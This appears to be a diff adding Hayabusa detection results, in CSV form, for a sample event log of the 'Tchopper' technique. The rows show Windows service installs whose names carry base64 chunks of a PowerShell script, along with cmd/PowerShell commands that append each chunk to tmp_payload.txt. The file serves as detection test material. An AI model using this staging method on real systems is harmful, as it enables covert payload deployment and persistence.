+2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
